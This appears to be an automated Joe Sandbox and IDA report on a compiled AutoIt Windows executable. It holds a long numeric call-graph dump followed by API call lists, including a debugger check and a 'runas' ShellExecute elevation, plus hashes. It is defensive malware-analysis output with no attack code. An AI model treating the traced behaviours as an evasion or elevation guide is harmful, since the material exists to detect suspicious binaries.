85631 416b04 __malloc_crt 46 API calls 85629->85631 85633 41db31 85631->85633 85634 41dc17 85632->85634 85635 41df8f GetLastError 85632->85635 85638 41db59 85633->85638 85639 41db3b 85633->85639 85634->85635 85640 41dc2b 85634->85640 85636 41de16 85635->85636 85637 41df9c 85635->85637 85647 417f9d __dosmaperr 46 API calls 85636->85647 85653 41dd9b 85636->85653 85642 417f77 ___crtsetenv 46 API calls 85637->85642 85641 420494 __lseeki64_nolock 48 API calls 85638->85641 85643 417f77 ___crtsetenv 46 API calls 85639->85643 85651 41dc47 85640->85651 85652 41de5b 85640->85652 85640->85653 85644 41db67 85641->85644 85645 41dfa1 85642->85645 85646 41db40 85643->85646 85644->85632 85648 417f8a __read 46 API calls 85645->85648 85649 417f8a __read 46 API calls 85646->85649 85647->85653 85648->85653 85649->85626 85650 413748 _free 46 API calls 85650->85626 85655 41dd28 85651->85655 85656 41dcab ReadFile 85651->85656 85652->85653 85654 41ded0 ReadFile 85652->85654 85653->85626 85653->85650 85658 41deef GetLastError 85654->85658 85664 41def9 85654->85664 85655->85653 85661 41dda3 85655->85661 85662 41dd96 85655->85662 85669 41dd60 85655->85669 85657 41dcc9 GetLastError 85656->85657 85663 41dcd3 85656->85663 85657->85651 85657->85663 85658->85652 85658->85664 85659 41ddec MultiByteToWideChar 85659->85653 85660 41de10 GetLastError 85659->85660 85660->85636 85666 41ddda 85661->85666 85661->85669 85665 417f77 ___crtsetenv 46 API calls 85662->85665 85663->85651 85667 420494 __lseeki64_nolock 48 API calls 85663->85667 85664->85652 85668 420494 __lseeki64_nolock 48 API calls 85664->85668 85665->85653 85670 420494 __lseeki64_nolock 48 API calls 85666->85670 85667->85663 85668->85664 85669->85659 85671 41dde9 85670->85671 85671->85659 85672->85555 85673->85570 85674->85559 85675->85563 85676->85570 85677->85566 85678->85563 85679->85576 85680->85575 85681->85570 85683 416b04 __malloc_crt 46 API calls 85682->85683 85684 420618 85683->85684 85684->85585 85685->85582 85686->85592 85690 
4148b3 GetSystemTimeAsFileTime __aulldiv 85687->85690 85689 442c6b 85689->85196 85690->85689 85691->85203 85692->85209 85693->85209 85699 45272f __tzset_nolock _wcscpy 85694->85699 85695 414d04 61 API calls __fread_nolock 85695->85699 85696 44afef GetSystemTimeAsFileTime 85696->85699 85697 4528a4 85697->85118 85697->85119 85698 4150d1 81 API calls _fseek 85698->85699 85699->85695 85699->85696 85699->85697 85699->85698 85701 44b1bc 85700->85701 85702 44b1ca 85700->85702 85703 4149c2 116 API calls 85701->85703 85704 44b1e1 85702->85704 85705 44b1d8 85702->85705 85706 4149c2 116 API calls 85702->85706 85703->85702 85735 4321a4 85704->85735 85705->85145 85708 44b2db 85706->85708 85708->85704 85710 44b2e9 85708->85710 85709 44b224 85711 44b253 85709->85711 85712 44b228 85709->85712 85713 44b2f6 85710->85713 85715 414a46 __fcloseall 82 API calls 85710->85715 85739 43213d 85711->85739 85714 44b235 85712->85714 85718 414a46 __fcloseall 82 API calls 85712->85718 85713->85145 85719 44b245 85714->85719 85722 414a46 __fcloseall 82 API calls 85714->85722 85715->85713 85717 44b25a 85720 44b260 85717->85720 85721 44b289 85717->85721 85718->85714 85719->85145 85724 414a46 __fcloseall 82 API calls 85720->85724 85726 44b26d 85720->85726 85749 44b0bf 87 API calls 85721->85749 85722->85719 85724->85726 85725 44b28f 85750 4320f8 46 API calls _free 85725->85750 85727 414a46 __fcloseall 82 API calls 85726->85727 85729 44b27d 85726->85729 85727->85729 85729->85145 85730 44b295 85731 44b2a2 85730->85731 85732 414a46 __fcloseall 82 API calls 85730->85732 85733 44b2b2 85731->85733 85734 414a46 __fcloseall 82 API calls 85731->85734 85732->85731 85733->85145 85734->85733 85736 4321cb 85735->85736 85738 4321b4 __tzset_nolock _memmove 85735->85738 85737 414d04 __fread_nolock 61 API calls 85736->85737 85737->85738 85738->85709 85740 4135bb _malloc 46 API calls 85739->85740 85741 432150 85740->85741 85742 4135bb _malloc 46 API calls 85741->85742 85743 432162 85742->85743 85744 4135bb _malloc 46 
API calls 85743->85744 85745 432174 85744->85745 85747 432189 85745->85747 85751 4320f8 46 API calls _free 85745->85751 85747->85717 85748 432198 85748->85717 85749->85725 85750->85730 85751->85748 85752->85048 85753->85049 85754->85069 85755->85069 85756->85069 85757->85063 85758->85069 85759->85069 85760->85073 85761->85082 85762->85084 85763->85084 85813 410160 85764->85813 85766 41012f GetFullPathNameW 85767 410147 moneypunct 85766->85767 85767->84902 85769 4102cb SHGetDesktopFolder 85768->85769 85772 410333 _wcsncpy 85768->85772 85770 4102e0 _wcsncpy 85769->85770 85769->85772 85771 41031c SHGetPathFromIDListW 85770->85771 85770->85772 85771->85772 85772->84906 85774 4101bb 85773->85774 85778 425f4a 85773->85778 85775 410160 52 API calls 85774->85775 85777 4101c7 85775->85777 85776 4114ab __wcsicoll 58 API calls 85776->85778 85817 410200 52 API calls 2 library calls 85777->85817 85778->85776 85781 425f6e 85778->85781 85780 4101d6 85818 410200 52 API calls 2 library calls 85780->85818 85781->84908 85783 4101e9 85783->84908 85785 40f760 126 API calls 85784->85785 85786 40f584 85785->85786 85787 429335 85786->85787 85788 40f58c 85786->85788 85791 4528bd 118 API calls 85787->85791 85789 40f598 85788->85789 85790 429358 85788->85790 85843 4033c0 113 API calls 7 library calls 85789->85843 85844 434034 86 API calls _wprintf 85790->85844 85793 42934b 85791->85793 85796 429373 85793->85796 85797 42934f 85793->85797 85795 40f5b4 85795->84904 85799 4115d7 52 API calls 85796->85799 85800 431e58 82 API calls 85797->85800 85798 429369 85798->85796 85803 4293c5 moneypunct 85799->85803 85800->85790 85801 42959c 85802 413748 _free 46 API calls 85801->85802 85804 4295a5 85802->85804 85803->85801 85810 401b10 52 API calls 85803->85810 85819 444af8 85803->85819 85822 44b41c 85803->85822 85829 402780 85803->85829 85837 4022d0 85803->85837 85845 44c7dd 64 API calls 3 library calls 85803->85845 85805 431e58 82 API calls 85804->85805 85806 4295b1 85805->85806 85810->85803 85814 410167 
_wcslen 85813->85814 85815 4115d7 52 API calls 85814->85815 85816 41017e _wcscpy 85815->85816 85816->85766 85817->85780 85818->85783 85820 4115d7 52 API calls 85819->85820 85821 444b27 _memmove 85820->85821 85821->85803 85824 44b429 85822->85824 85823 4115d7 52 API calls 85825 44b440 85823->85825 85824->85823 85826 44b45e 85825->85826 85827 401b10 52 API calls 85825->85827 85826->85803 85828 44b453 85827->85828 85828->85803 85830 402790 moneypunct _memmove 85829->85830 85831 402827 85829->85831 85832 4115d7 52 API calls 85830->85832 85833 4115d7 52 API calls 85831->85833 85834 402797 85832->85834 85833->85830 85835 4115d7 52 API calls 85834->85835 85836 4027bd 85834->85836 85835->85836 85836->85803 85838 4022e0 85837->85838 85840 40239d 85837->85840 85839 4115d7 52 API calls 85838->85839 85838->85840 85841 402320 moneypunct 85838->85841 85839->85841 85840->85803 85841->85840 85842 4115d7 52 API calls 85841->85842 85842->85841 85843->85795 85844->85798 85845->85803 85847 402539 moneypunct 85846->85847 85848 402417 85846->85848 85847->84912 85848->85847 85849 4115d7 52 API calls 85848->85849 85850 402443 85849->85850 85851 4115d7 52 API calls 85850->85851 85852 4024b4 85851->85852 85852->85847 85854 4022d0 52 API calls 85852->85854 85875 402880 85852->85875 85854->85852 85859 401566 85855->85859 85856 401794 85927 40e9a0 90 API calls 85856->85927 85859->85856 85860 4010a0 52 API calls 85859->85860 85861 40167a 85859->85861 85860->85859 85862 4017c0 85861->85862 85928 45e737 90 API calls 3 library calls 85861->85928 85862->84914 85864 40bc70 52 API calls 85863->85864 85873 40d451 85864->85873 85865 40d50f 85931 410600 52 API calls 85865->85931 85867 427c01 85932 45e737 90 API calls 3 library calls 85867->85932 85868 40e0a0 52 API calls 85868->85873 85870 401b10 52 API calls 85870->85873 85871 40d519 85871->84917 85873->85865 85873->85867 85873->85868 85873->85870 85873->85871 85929 40f310 53 API calls 85873->85929 85930 40d860 91 API calls 85873->85930 85876 4115d7 52 
API calls 85875->85876 85877 4028b3 85876->85877 85878 4115d7 52 API calls 85877->85878 85916 4028c5 moneypunct _memmove 85878->85916 85879 402780 52 API calls 85914 402b1e moneypunct 85879->85914 85880 427d62 85883 403350 52 API calls 85880->85883 85882 402aeb moneypunct 85882->85879 85890 42802b moneypunct 85882->85890 85892 427d6b 85883->85892 85884 402bb6 85918 403060 53 API calls 85884->85918 85886 402bca 85887 427f63 85886->85887 85888 402bd4 85886->85888 85924 460879 92 API calls 3 library calls 85887->85924 85891 402780 52 API calls 85888->85891 85889 403350 52 API calls 85889->85916 85894 402bdf 85891->85894 85898 427f2c 85892->85898 85921 403020 52 API calls _memmove 85892->85921 85894->85852 85897 427fd5 85925 460879 92 API calls 3 library calls 85897->85925 85923 460879 92 API calls 3 library calls 85898->85923 85899 402780 52 API calls 85899->85916 85902 427fa5 85910 402780 52 API calls 85902->85910 85903 402f00 52 API calls 85903->85916 85905 427fe4 85909 402780 52 API calls 85905->85909 85906 428000 85926 460879 92 API calls 3 library calls 85906->85926 85908 4026f0 52 API calls 85913 402a85 CharUpperBuffW 85908->85913 85912 427f48 85909->85912 85910->85914 85912->85914 85913->85916 85914->85852 85915 4115d7 52 API calls 85915->85916 85916->85880 85916->85882 85916->85884 85916->85889 85916->85897 85916->85898 85916->85899 85916->85902 85916->85903 85916->85906 85916->85908 85916->85915 85917 4031b0 63 API calls 85916->85917 85919 402f80 92 API calls _memmove 85916->85919 85920 402280 52 API calls 85916->85920 85922 4013a0 52 API calls 85916->85922 85917->85916 85918->85886 85919->85916 85920->85916 85921->85892 85922->85916 85923->85912 85924->85912 85925->85905 85926->85914 85927->85861 85928->85862 85929->85873 85930->85873 85931->85871 85932->85871 85933->84930 85934->84931 85936 4091c6 85935->85936 85937 42c5fe 85935->85937 85936->84990 85937->85936 85938 40bc70 52 API calls 85937->85938 85939 42c64e InterlockedIncrement 85938->85939 85940 
42c665 85939->85940 85946 42c697 85939->85946 85942 42c672 InterlockedDecrement Sleep InterlockedIncrement 85940->85942 85940->85946 85941 42c737 InterlockedDecrement 85943 42c74a 85941->85943 85942->85940 85942->85946 85945 408f40 VariantClear 85943->85945 85944 42c731 85944->85941 85947 42c752 85945->85947 85946->85941 85946->85944 86093 408e80 85946->86093 86106 410c60 VariantClear moneypunct 85947->86106 85952 42c6db 85953 402160 52 API calls 85952->85953 85954 42c6e5 85953->85954 85955 45340c 85 API calls 85954->85955 85956 42c6f1 85955->85956 86103 40d200 52 API calls 2 library calls 85956->86103 85958 42c6fb 86104 465124 53 API calls 85958->86104 85960 42c715 85961 42c76a 85960->85961 85962 42c719 85960->85962 85963 401b10 52 API calls 85961->85963 86105 46fe32 VariantClear 85962->86105 85965 42c77e 85963->85965 85966 401980 53 API calls 85965->85966 85972 42c796 85966->85972 85967 42c812 86108 46fe32 VariantClear 85967->86108 85969 42c82a InterlockedDecrement 86109 46ff07 54 API calls 85969->86109 85971 42c864 86110 45e737 90 API calls 3 library calls 85971->86110 85972->85967 85972->85971 86107 40ba10 52 API calls 2 library calls 85972->86107 85973 42c9ec 86153 47d33e 338 API calls 85973->86153 85977 42c9fe 86154 46feb1 VariantClear VariantClear 85977->86154 85979 408f40 VariantClear 85989 42c849 85979->85989 85980 42ca08 85981 401b10 52 API calls 85980->85981 85983 42ca15 85981->85983 85982 408f40 VariantClear 85984 42c891 85982->85984 85986 40c2c0 52 API calls 85983->85986 86111 410c60 VariantClear moneypunct 85984->86111 85985 401980 53 API calls 85985->85989 85990 42c874 85986->85990 85988 402780 52 API calls 85988->85989 85989->85973 85989->85979 85989->85985 85989->85988 86112 40a780 85989->86112 85990->85982 85992 42ca59 85990->85992 85992->85992 85994 40afc4 85993->85994 85995 40b156 85993->85995 85996 40afd5 85994->85996 85997 42d1e3 85994->85997 86165 45e737 90 API calls 3 library calls 85995->86165 86002 40a780 201 API calls 85996->86002 86018 
40b11a moneypunct 85996->86018 86166 45e737 90 API calls 3 library calls 85997->86166 86000 40b143 86000->84990 86001 42d1f8 86006 408f40 VariantClear 86001->86006 86004 40b00a 86002->86004 86004->86001 86007 40b012 86004->86007 86005 42d4db 86005->86005 86006->86000 86008 40b04a 86007->86008 86010 42d231 VariantClear 86007->86010 86013 40b094 moneypunct 86007->86013 86012 40b05c moneypunct 86008->86012 86167 40e270 VariantClear moneypunct 86008->86167 86009 40b108 86009->86018 86168 40e270 VariantClear moneypunct 86009->86168 86010->86012 86011 42d45a VariantClear 86011->86018 86012->86013 86015 4115d7 52 API calls 86012->86015 86013->86009 86017 42d425 moneypunct 86013->86017 86015->86013 86017->86011 86017->86018 86018->86000 86169 45e737 90 API calls 3 library calls 86018->86169 86020 40900d 86019->86020 86021 408fff 86019->86021 86024 42c3f6 86020->86024 86026 42c44a 86020->86026 86027 40a780 201 API calls 86020->86027 86030 42c47b 86020->86030 86032 42c4cb 86020->86032 86033 42c564 86020->86033 86036 42c548 86020->86036 86039 409112 86020->86039 86041 42c528 86020->86041 86043 4090df 86020->86043 86044 4090ea 86020->86044 86053 4090f2 moneypunct 86020->86053 86172 4534e3 52 API calls 86020->86172 86174 40c4e0 201 API calls 86020->86174 86170 403ea0 52 API calls __cinit 86021->86170 86173 45e737 90 API calls 3 library calls 86024->86173 86175 45e737 90 API calls 3 library calls 86026->86175 86027->86020 86176 451b42 61 API calls 86030->86176 86178 47faae 240 API calls 86032->86178 86037 408f40 VariantClear 86033->86037 86034 42c491 86034->86053 86177 45e737 90 API calls 3 library calls 86034->86177 86181 45e737 90 API calls 3 library calls 86036->86181 86037->86053 86038 42c4da 86038->86053 86179 45e737 90 API calls 3 library calls 86038->86179 86039->86036 86049 40912b 86039->86049 86180 45e737 90 API calls 3 library calls 86041->86180 86043->86044 86047 408e80 VariantClear 86043->86047 86048 408f40 VariantClear 86044->86048 86047->86044 86048->86053 
86049->86053 86171 403e10 53 API calls 86049->86171 86051 40914b 86052 408f40 VariantClear 86051->86052 86052->86053 86053->84990 86182 408d90 86054->86182 86056 429778 86211 410c60 VariantClear moneypunct 86056->86211 86058 408cf9 86058->86056 86060 42976c 86058->86060 86062 408d2d 86058->86062 86059 429780 86210 45e737 90 API calls 3 library calls 86060->86210 86198 403d10 86062->86198 86065 408d71 moneypunct 86065->84990 86066 408f40 VariantClear 86067 408d45 moneypunct 86066->86067 86067->86065 86067->86066 86068->84990 86069->84990 86070->84990 86071->84990 86072->84941 86073->84946 86074->84990 86075->84990 86076->84990 86077->84990 86078->84991 86079->84991 86080->84991 86081->84991 86082->84991 86083->84991 86084->84991 86086 403cdf 86085->86086 86087 408f40 VariantClear 86086->86087 86088 403ce7 86087->86088 86088->84985 86089->84991 86090->84991 86091->84990 86092->84938 86094 408e88 86093->86094 86096 408e94 86093->86096 86095 408f40 VariantClear 86094->86095 86095->86096 86097 45340c 86096->86097 86098 453439 86097->86098 86099 453419 86097->86099 86098->85952 86100 45342f 86099->86100 86155 4531b1 85 API calls 5 library calls 86099->86155 86100->85952 86102 453425 86102->85952 86103->85958 86104->85960 86105->85944 86106->85936 86107->85972 86108->85969 86109->85989 86110->85990 86111->85936 86113 40a7a6 86112->86113 86114 40ae8c 86112->86114 86116 4115d7 52 API calls 86113->86116 86156 41130a 51 API calls __cinit 86114->86156 86137 40a7c6 moneypunct _memmove 86116->86137 86117 40a86d 86118 40a878 moneypunct 86117->86118 86119 40abd1 86117->86119 86122 40a884 moneypunct 86118->86122 86128 408f40 VariantClear 86118->86128 86161 45e737 90 API calls 3 library calls 86119->86161 86120 401b10 52 API calls 86120->86137 86122->85989 86123 40bc10 53 API calls 86123->86137 86124 40b5f0 89 API calls 86124->86137 86125 408e80 VariantClear 86125->86137 86126 42b791 VariantClear 86126->86137 86127 42ba2d VariantClear 86127->86137 86128->86118 86129 42bb6a 86164 

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                          • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                            • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                            • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                            • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                          Strings
                                                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                          • runas, xrefs: 0042E2AD, 0042E2DC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                          • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                          • API String ID: 2495805114-3383388033
                                                                          • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                          • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                          • String ID: 0SH
                                                                          • API String ID: 3363477735-851180471
                                                                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: IsThemeActive$uxtheme.dll
                                                                          • API String ID: 2574300362-3542929980
                                                                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchSleepTranslate
                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                          • API String ID: 1762048999-758534266
                                                                          • Opcode ID: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                          • Opcode Fuzzy Hash: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • __wcsicoll.LIBCMT ref: 00402007
                                                                          • __wcsicoll.LIBCMT ref: 0040201D
                                                                          • __wcsicoll.LIBCMT ref: 00402033
                                                                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                          • __wcsicoll.LIBCMT ref: 00402049
                                                                          • _wcscpy.LIBCMT ref: 0040207C
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                          • API String ID: 3948761352-1609664196
                                                                          • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                          • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                          • __wsplitpath.LIBCMT ref: 0040E41C
